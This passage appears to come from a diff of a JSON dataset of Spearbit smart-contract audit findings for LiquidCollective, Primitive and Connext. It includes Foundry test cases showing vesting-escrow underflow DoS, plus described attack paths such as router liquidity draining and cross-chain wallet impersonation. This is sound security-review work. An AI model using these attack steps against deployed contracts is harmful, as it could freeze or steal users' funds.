_deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice 9 vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert for UNDERFLOW because now the balance of the escrow has been ,! increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp at the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decide to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice 10 vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount, 11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } 11 }", + "title": "Unnecessary fee reserves check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The fee amount is always taken on the input and the fee percentage is always less than 100%. Therefore, the fee is always less than the input. The following check should never fail adjustedInputReserveWad += self.input; // feeAmountUnit <= self.input <= adjustedInputReserveWad if (feeAmountUnit > adjustedInputReserveWad) revert SwapLib_FeeTooHigh();", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Critical Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Coverage funds might be pulled not only for the purpose of covering slashing losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable In practice, however, it is possible that these funds will be pulled not only in emergency events. _maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough.", + "title": "swapInternal() shouldn't use msg.sender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "As reported by the Connext team, the internal stable swap checks if msg.sender has sufficient funds on execute(). This msg.sender is the relayer which normally wouldn't have these funds so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function _handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(... ) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), \"more than you own\"); ... } // msg.sender is the relayer", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider preventing CoverageFundAddress to be set as address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of River.setCoverageFund and CoverageFundAddress.set both func- tion do not revert when the _newCoverageFund address parameter is equal to address(0). If the Coverage Fund address is empty, the River._pullCoverageFunds function will return earlier and will not pull any coverage fund.", + "title": "MERKLE.insert does not return the updated tree leaf count", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true. If the updated count is 2k (2n + 1) where k , n 2 N [ 0 then the return value would be 2n + 1. Currently, the returned value of insert is not being used, otherwise, this could be a bigger issue.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "CoverageFund.initCoverageFundV1 might be front-runnable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a 2 phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts deployment scripts are using the TUPProxy correctly, however in that case we were not able to find the deployment script for CoverFund, so we decided to raise this point to make sure you are following the previous policy also for this contract.", + "title": "PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets de- ployed and its constructor is called, if _mirrorConnector == address(0) then setting the mirrorConnector stor- age variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now since the setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by it and assign their own fxRootTunnel PolygonSpokeConnector (PolygonHubConnector) anyone can call (fxChildTunnel) address (note, fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel Note that (fxChildTunnel) to be set once (non-zero address value) so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMir- rorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector) the following will try to execute: 9 // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert since fxRootTunnel (fxChildTunnel) is already set. Thus if the owner of PolygonSpokeConnec- tor (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing the setMirrorConnector and setFxRootTunnel (fxChildTunnel) endpoints for the owner. PolygonSpokeConnector's", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "ken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. the minted TLC tokens must The _account owner of remember to call tlcTo- Without doing that anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO proposing, rejecting or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked.", + "title": "A malicious owner or user with a Role.Router role can drain a router's liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A malicious owner or user with Role.Router Role denominated as A in this example, can drain a router's liquidity for a current router (a router that has already been added to the system and might potentially have added big liquidities to some assets). Here is how A can do it (can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens that the router has liquidity and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this connext instance) and any user who has a Role.Router Role with their liquidity. So the setup is not trustless currently.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider using unchecked block to save some gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of the unchecked block to save a bit of gas.", + "title": "Users are forced to accept any slippage on the destination chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The documentation mentioned that there is cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If the high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate. Otherwise, their funds will be stuck in Connext.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Depending on the value of duration or amount it is possible to create a vesting schedule that would release zero token after a whole period has elapsed. This is an edge case scenario but would still be possible given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), 15 revocable: true }) ); // One whole period pass and alice check how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Preservation of msg.sender in ZkSync could break certain trust assumption", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), this is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts as the same account/wallet address might be owned by different persons on different chains. This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs. For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2 which allows users to define its salt when deploying the wallet, Bob might use ABC as salt in Ethereum and Alice might use ABC as salt in Zksync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute Hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on ZkSync chain. Alice performs a xcall from Ethereum to ZkSync with delegate set to 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. 11 Bob (attacker) saw that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of the 0xABC by interacting with the wallet factory to deploy a smart contract wallet on the same address on Ethereum. Bob can do so by checking out the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make a L1 -> L2 request by calling the ZKSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is only specific to ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "CoverageFund - Checks-Effects-Interactions best practice is violated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it's recommended to follow the Checks-effects-interactions pattern anyway.", + "title": "No way to update a Stable Swap once assigned to a key", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for token), it cannot be updated nor deleted. A Swap can be hacked or an improved version may be released which will warrant updating the Swap for a key.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "River contract allows setting an empty metadata URI", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string.", + "title": "Renouncing ownership or admin role could affect the normal operation of Connext", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Instance 1 - Renouncing ownership All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. 12 One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved since there is no way to unpause and add the connector back to the system. Instance 2 - Renouncing admin role All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only Admin remaining used revokeRole to re- nounce its Admin role. 2. Now the contract is left with Zero Owner & Admin. 3. All swap operations collect adminFees via SwapUtils.sol contract. In absence of any Admin & Owner, these fees will get stuck in the contract with no way to retrieve them. Normally it would have been withdrawn using withdrawSwapAdminFees|SwapAdminFacet.sol. 4. This is simply one example, there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider requiring that the _cliffDuration is a multiple of _period", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "When a vesting schedule is created via _createVestingSchedule, the only check made on _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0", + "title": "No way of removing Fraudulent Roots", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Fraudulent Roots cannot be removed once fraud is detected by the Watcher. This means that Fraud Roots will be propogated to each chain.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Add documentation about the scenario where a vesting schedule can be created in the past", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of ERC20VestableVotesUpgradeable _createVestingSchedule func- tion, there is no check for the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past. Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked).", + "title": "Large number of inbound roots can DOS the RootManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or insert function of the RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis causing a large number of Gnosis's outboundRoots to be forwarded to GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent at the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 13 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received out- boundRoot into the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commit- Block will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots to the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as the mainnet usually as a far higher gas cost than the Spoke.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of _createVestingSchedule allows the creation of vesting schedules that Start in the past: _start < block.timestamp. Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens. The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error. The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many token vested, lock period too long, etc...).", + "title": "Missing mirrorConnector check on Optimism hub connector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "processMessageFromRoot() calls _processMessage() to process messages for the \"fast\" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. 14 function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, \"!length\"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "getVestingSchedule returns misleading information if the vesting token creator revokes the sched- ule", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config 18 { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true This means that after 10 days, Alice would own in her balance 10 TLC tokens. If Alluvial calls revokeVestingSchedule before the cliff period ends, all of the tokens will be returned to Alluvial but the getVestingSchedule function would still display the same information with just the end attribute updated. An external dApp or contract that does not check the new end and compares it to cliffDuration, lockDura- tion, and period but only uses the amount would display the wrong number of vested tokens for Alice at a given timestamp.", + "title": "Add _mirrorConnector to _sendMessage of BaseMultichain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right as the first parameter is the target contract to interact with according to multichain cross- chain. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... ); }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount while the only attribute changed by revokeVestingSchedule is the end. 19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke. Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); creator = makeAddr(\"creator\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator call revokeVestingSchedule revoking the vested schedule setting the new end as half ,! of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this means also that at max alice will have 5 token vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp at day 7 of the schedule vm.warp(block.timestamp + 7 days); 21 // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp at day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Unauthorized access to change acceptanceDelay", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The acceptanceDelay along with supportedInterfaces[] can be set by any user without the need of any Authorization once the init function of DiamondInit has been called and set. This is happening since caller checks (LibDiamond.enforceIsContractOwner();) are missing for these fields. Since acceptanceDelay defines the time post which certain action could be executed, setting a very large value could DOS the system (new owner cannot be set) and setting very low value could make changes without consid- eration time (Setting/Renounce Admin, Disable whitelisting etc at ProposedOwnableFacet.sol )", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider writing clear documentation on how the voting power and delegation works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in the Alluvial's natspec contract): ERC20VestableVotesUpgradeableV1 extension The an of is By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because of how ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be coun- terintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them. When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, 